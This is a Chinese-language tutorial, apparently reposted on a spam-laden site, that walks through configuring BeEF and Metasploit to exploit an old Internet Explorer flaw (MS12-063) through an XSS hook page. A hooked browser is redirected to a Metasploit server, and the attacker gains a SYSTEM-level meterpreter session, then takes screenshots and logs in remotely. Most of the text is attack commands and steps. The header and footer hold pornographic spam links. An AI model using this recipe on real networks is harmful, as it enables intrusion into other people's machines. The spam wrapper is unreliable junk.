六月婷婷综合激情-六月婷婷综合-六月婷婷在线观看-六月婷婷在线-亚洲黄色在线网站-亚洲黄色在线观看网站

明輝手游網(wǎng)中心:是一個(gè)免費(fèi)提供流行視頻軟件教程、在線學(xué)習(xí)分享的學(xué)習(xí)平臺(tái)!

metasploit使用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)

[摘要]系統(tǒng):KALI 用到的工具:beEF+msf 利用的IE漏洞是:http://www.rapid7.com/db/modules/exploit/windows/browser/ie_execcom...

系統(tǒng):KALI

用到的工具:beEF+msf

利用的IE漏洞是:http://www.rapid7.com/db/modules/exploit/windows/browser/ie_execcommand_uaf

MS12-063
AutomaticIE 7 on Windows XP SP3IE 8 on Windows XP SP3IE 7 on Windows VistaIE 8 on Windows VistaIE 8 on Windows 7IE 9 on Windows 7
用到的beef+msf

先配置下:

root@kali:~# cd /usr/share/beef-xss/root@kali:/usr/share/beef-xss# lsbeef beef_key.pem config.yaml db Gemfile modulesbeef_cert.pem bundle core extensions Gemfile.lock
編輯下config.yaml
把metasploit :false改成true

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)1

再進(jìn)入extensions/metasploit/
同樣修改下config.yaml
把host跟callback_host 改成自己的IP 這里是220.128

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)2

再改動(dòng)下custom path:

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)3

這樣beef已經(jīng)配置好了。那就運(yùn)行下metasploit

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)4

運(yùn)行msf后 數(shù)據(jù)庫連接下,不然上線也會(huì)沒有提示的。這里的pass 就是extensions/metasploit/config.yaml里面的pass

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)5

這樣就沒有什么問題。我們可以先看一下beef.數(shù)據(jù)庫只要連上了就不會(huì)出現(xiàn)msf的api錯(cuò)誤的。

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)6

進(jìn)入beef

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)7

賬號(hào)密碼beef 配置文件里面有。beef:beef

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)8

那beef已經(jīng)都OK了。
現(xiàn)在來搞下選擇下要顯示的頁面:

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)9

hook.js 運(yùn)行beef 顯示出來的。
別忘記運(yùn)行下apache。

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)10

我們再進(jìn)入msf

use exploit/windows/browser/ie_execcommand_uaf
可以自己根據(jù)自己的要求來選擇。

show options
port可以自已改。

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)11

我用xp+ie7

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)12

直接訪問下我們的頁面192.168.220.128/xss/
beef就會(huì)顯示出來了。

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)13

點(diǎn)擊 commands-hookeddomain-REDIRECT BROWSER 讓他重新跳轉(zhuǎn)到我們msf生成的地址上。beef很多功能。
把地址改成192.168.220.128:8080(msf生成的地址)

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)14

我們就會(huì)看到msf上面已經(jīng)顯示出來了。 回顯了sessions
payload可以自己去改。我使用的meterpreter載荷

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)15

執(zhí)行sessions -i

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)16

執(zhí)行sessions -i ID號(hào)
可以執(zhí)行任意命令已經(jīng)是系統(tǒng)權(quán)限

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)17

執(zhí)行下screenshost

meterpreter > screenshot Screenshot saved to: /root/dlsSQBkF.jpeg
就可以看到當(dāng)前主機(jī)的屏幕內(nèi)容。

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)18

也可以rdesktop 遠(yuǎn)程連接上去。
參數(shù)rdesktop -f ip -u username -p password
這也是一種xss掛馬拿內(nèi)網(wǎng)主機(jī)。

注:鄙人每天都在寫一些metasploit的玩法,如果有大神有什么好的方法希望告訴我,我更新在空間,分享給大家。


上面是電腦上網(wǎng)安全的一些基礎(chǔ)常識(shí),學(xué)習(xí)了安全知識(shí),幾乎可以讓你免費(fèi)電腦中毒的煩擾。




主站蜘蛛池模板: 欧美亚洲综合另类型色妞 | 亚洲一区二区三区高清视频 | 伊人影院在线播放 | 日本在线网站 | 亚洲性大片 | 网站国产| 日韩黄色一级大片 | 欧美午夜网| 亚洲免费三级 | 色综合久久久久 | 欧美性大战久久久久久久 | 香蕉欧美成人精品a∨在线观看 | 亚洲国产图片 | 五级毛片| 日韩毛片免费视频 | 亚洲综合资源 | 性刺激欧美三级在线观看 | 午夜毛片免费看 | 亚洲日本高清 | 天天看片天天爽_免费播放 天天看片天天爽 | 中文国产成人精品久久一 | 性高湖久久久久久久久 | 日韩免费在线视频观看 | 亚洲视频在线观看 | 日韩一级大片 | 日韩免费不卡 | 日本中文不卡 | 日韩一级片播放 | 日本精品久久久久久久久免费 | 色婷婷久 | 日韩专区亚洲综合久久 | 天堂网传媒 | 亚洲一二三在线 | 最近免费韩国高清在线观看 | 亚洲欧美综合在线观看 | 青青草国产97免久久费观看 | 亚洲欧美日本视频 | 青青草原91 | 天天综合天天添夜夜添狠狠添 | 亚州精品视频 | 青青青手机在线观看 |